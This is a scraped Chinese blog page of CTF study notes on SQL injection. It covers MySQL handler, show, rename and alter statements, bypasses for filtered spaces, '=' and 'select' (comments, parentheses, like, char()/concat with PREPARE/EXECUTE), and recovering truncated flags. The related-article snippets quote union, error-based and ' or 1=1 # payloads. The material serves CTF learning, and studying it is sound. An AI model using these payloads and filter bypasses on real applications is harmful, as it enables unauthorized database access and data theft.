SQL注入相关语句及绕过

最新推荐文章于 2022-11-01 23:17:45 发布
最新推荐文章于 2022-11-01 23:17:45 发布
阅读量211 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51313108/article/details/119728326
版权

SQL注入相关语句及绕过

handler语句

handler table_name open:打开一个表的会话
handler table_name read first:读取第一行数据
handler table_name read next:读取第二行数据
handler table_name close:关闭会话

show和rename

show语句

show databases 显示当前数据库名称
show tables 显示当前数据库中所有的表名称
show columns from table_name 显示指定表中的数据类型信息

rename语句

rename table table1 to table2 将table1的名称改为table2

alter语句

alter table table_name add column_name datatype 在指定的表中添加指定的列
alert table table_name change column_name data datatype 指定的表中修改指定的列
default:DEFAULT 约束用于向列中插入默认值。
如果没有规定其他的值,那么会将默认值添加到所有的新记录。

过滤空格

空格被过滤用/**/来绕过;
还可以使用括号来绕过() select(database())空格处要有)或(其中一个
例如(select(group_concat(password))from(H4rDsq1))

过滤=

等号=被过滤可以用like来绕过

flag只有一半

flag只被显示出一半
select left(name,25) from table_name
select right(name,25) from table_name
最后得到的结果记得把重叠的部分删除

预处理命令绕过

预处理命令绕过在一次堆叠注入时见过强网杯 2019 随便注。大神的writeupBUUCTF 随便注 WP。本题过滤了select所以可以利用concat拼接字符串然后用预处理命令来绕过。
预处理命令

PREPARE sqla from '[my sql sequece]';   //预定义SQL语句
EXECUTE sqla;  //执行预定义SQL语句
(DEALLOCATE || DROP) PREPARE sqla;  //删除预定义SQL语句

预处理命令参数变量来传递

set @sql=concat(char(115,101,108,101,99,116)," * from \`1919810931114514\`")
PREPARE sqlb from @sql  //定义预处理命令
EXECUTE sqlb  //执行预处理命令
(DEALLOCATE || DROP) PREPARE sqlb; // 删除预处理命令
山中雨客
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
实验吧web之简单的sql注入1
The Road Of Sec
05-06 8497
0x.部分题解 一、通过加英文单引号1‘ ,检测到存在注入:   php?id=1   二、按常规步骤输入1 and 1=1和1 and 1=2的时候,发现报了“SQLi deteced!”而无法查询:php?1 and 1=1  php?1 and 1=2       那么,去掉空格输入1and1=1和1and1=2呢?       确定是过滤了空格!
二次注入与报错注入简单了解
现代鲁滨逊的博客
12-14 313
文章目录二次注入报错注入wp 二次注入 报错注入 十种MySQL报错注入 wp test"^updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1)# password=aaa&email=bbb&username=a"||(updatexml(0x7e,concat(7,(select(group
CTF Show sql注入
xian653617125的博客
04-06 768
171 题目已经给出了拼接的语句是带有单引号的所以我们要闭合并且利用-- 或者%23注释掉后面的单引号 1' order by 3-- A 首先查询字段有多少,我试了2,3,4,到4的时候端口异常所以判断为三个字段 1' union seLect 1,2,3 -- 1' union select 1,database(),3 -- A 然后利用sql语句确定回显点,知道回显点后我们可以利用database()函数来返回数据库的名称。 1' union select 1,2,table_na
CTF-show-SQL注入-1
qq_52696970的博客
03-24 243
From: https://blog.csdn.net/qq_61237064/article/details/121421239 https://blog.csdn.net/weixin_48083470/article/details/119034415 CTF-show-sql注入1、web1712、web1723、web1734、web174 1、web171 在网页中给出的用户表中可以看到ID=3后,数据无法显示,这说明有三个字段数 判断字段后,首先查询数据库名字: ctfshow_web 1'
ctf.show的SQL注入(web171-web253)
wanan的博客
09-30 7276
ctf.show的SQL注入(web171-web253)
SQL注入绕过 单引号 限制继续注入
01-02
– 这往往给大家造成误解,认为只要变量过滤了’就可以防止SQL Injection攻击,这种意识为大量程序可以注入埋下祸根,其实仅仅过滤’是不够的,在’被过滤的情况下我们照样玩,看下面语句代码如下: //...
高级SQL注入:混淆和绕过.pdf
03-21
高级SQL注入:混淆和绕过 本文总结了高级SQL注入技术,包括混淆和绕过技术,旨在帮助安全研究人员和开发者更好地理解和防止SQL注入攻击。下面是本文中提到的关键知识点: 1. 过滤规避(Mysql):通过使用特殊的SQL...
SQL注入中的WAF绕过技术
08-03
SQL 注入中的 WAF 绕过技术 在 SQL 注入攻击中, Web 应用防火墙(WAF)是一个非常重要的安全防护机制。然而,攻击者可以使用各种技术来绕过 WAF 检测,从而达到攻击目的。本文将详细介绍 SQL 注入中的 WAF 绕过...
SQL注入绕过的技巧总结
09-09
本文主要探讨了三种SQL注入绕过技术:引号绕过、逗号绕过以及比较符(<, >)绕过,这些都是在SQL防注入措施下仍能实施攻击的有效手段。 首先,**引号绕过** 是针对那些过滤了单引号(')或双引号(")的系统。...
SQL注入绕过实战案例
最新发布
08-31
本文将深入探讨SQL注入的概念、工作原理,并通过"SQL注入实战案例"来阐述如何进行有效防御和绕过。我们将基于sqli-labs-master靶场进行学习,这是一个专门用于SQL注入攻防演练的平台。 SQL注入(SQL Injection)是...
报错注入显示不全问题
矜庄寂寥的博客
12-18 3938
目录介绍实验环境解决方法0x010x02 方法一(利用limit子句)0x02 方法二(使用mid函数)0x03 方法三(sqlmap O(∩_∩)O) 介绍 在sql主任中使用 updatexml extractvalue exp floor函数进行报错注入时,有时会出现由于数据的数量过多导致无法一次性显示所有内容,所以鄙人就去寻找了几种解决方法 实验环境 本次实验使用的是github上开源的sqli-labs训练靶场 地址:https://github.com/Audi-1/sqli-labs 解决
SQL注入1——显注(重学)
qq_52263650的博客
11-01 1033
SQL注入,大一学的了,摆了这么久,在学一遍吧
mysql的特定查询语句handler
m0_51607644的博客
02-22 573
1、说明 handler语句不具备select语句的所有功能。handler是mysql专用的语句,没有包含到SQL标准中。它每次只能查询1次记录,而select可以根据需要返回多条查询结果。资料上说它可以降低优化器对于SQL语句的解析与优化开销,从而提升查询性能。 2、handler语法 HANDLER table_name OPEN [ [AS] a] HANDLER table_name READ index_name { = | <= | >= | < | > } (v
SQL注入中的显示位
weixin_43379478的博客
12-10 3840
我们在进行手工SQL注入的时候会用到ORDER BY 查询列数,然后通过UNION SELECT爆出在网页中的显示位。这个显示位指的是网页中能够显示数据的位置。 举例来说,比如我们通过ORDER BY命令知道了表的列数为11。然后再使用UNION SELECT 1,2,3…,11 from table,网页中显示了信息8,那么说明网页只能够显示第8列中信息,不能显示其他列的信息。所以如果我们想要知...
SQL注入详解
热门推荐
qq_48904485的博客
03-21 2万+
针对SQL注入的攻击行为可描述为通过用户可控参数中注入SQL语法,破坏原有SQL结构,达到编写程序意料之外结果的攻击行为。 其成因可归结为以下两个原理叠加造成: 1、程序编写者在处理程序和数据库交互时,使用字符串凭借的方式构造SQL语句。 2、未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句中。 SQL注入的攻击方式分为:报错注入、布尔盲注 、延时注入、堆叠查询、联合查询 、二次注入等等
堆叠注入一些命令(部分)
weixin_43326436的博客
04-12 304
堆叠注入看名字应该就是知道是一堆 就是多个命令一起执行(自己理解) 大多都是1’;show databases;#查询数据库(都是例子) 1’;show tables;#查询所有的表 1’;show columns from wwwww;#查询wwwww中的所有列 还涉及了rename alert rename tables ‘ai’ to ‘ai2’;(表示将表ai的名字改为ai2,这里的符号应...
ctf.show web2 最简单的SQL注入
m0_46412682的博客
07-12 5054
ctf.show web2 最简单的SQL注入 1、一开始的页面 随便输入用户名和密码看它怎么反应 没报错,只是清空了用户名和密码 题目提示是sql注入,那就用burpsuit抓个包,发送到repeater 点击go 既然是登录的页面,那就用万能密码 ’ or 1=1 #,出现欢迎您,ctfshow,说明登录成功,这里得说明一下username=admin’ or 1=1 #password=123这条语句,#号是注释符,所以后面的语句是被注释掉的,所以剩下username=admin’ or 1=1,o
[CTFSHOW]SQL注入(WEB入门)
Y4tacker的博客
11-25 1万+
文章目录前言新手区web171web172web173web174 前言 看大家好像挺需要的所以在这里记录一下自己的脚本和payload,不做思路讲解,除非题目比较骚 新手区 可以看看我以前记录的小笔记 SQL注入之MySQL注入的学习笔记(一) SQL注入之MySQL注入学习笔记(二) web171 比较常规的题目不做讲解了,这里给出payload # 查数据库 payload = "-1'union select 1,2,group_concat(table_name) from information
OWASP学习之SQL注入
s11show_163的博客
02-28 973
一、sql注入注入点: 参数名 参数值 cookie 目录文件名 工具:sev3wvs或者啊D注入 是否存在sql注入: select * from news where id = 3-1' ##加单引号如果id=1‘、id=2‘、id=-1’、id=1 and 1=1‘ ##以及id=1‘ and1=2‘的返回结果不一样则说明存在注入。 ##也可以取消后面的单引号用‘#’或者‘...
"高级SQL注入:混淆和绕过的技术及方法
本文提供了一些用于绕过保护的SQL注入语句,但需要强调仅可用于安全研究目的,任何不当行为将承担后果。 在学习代码审计过程中,作者发现了这篇文章并进行了适当修改。不过作者并未提供原文链接,文章转发地址为...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值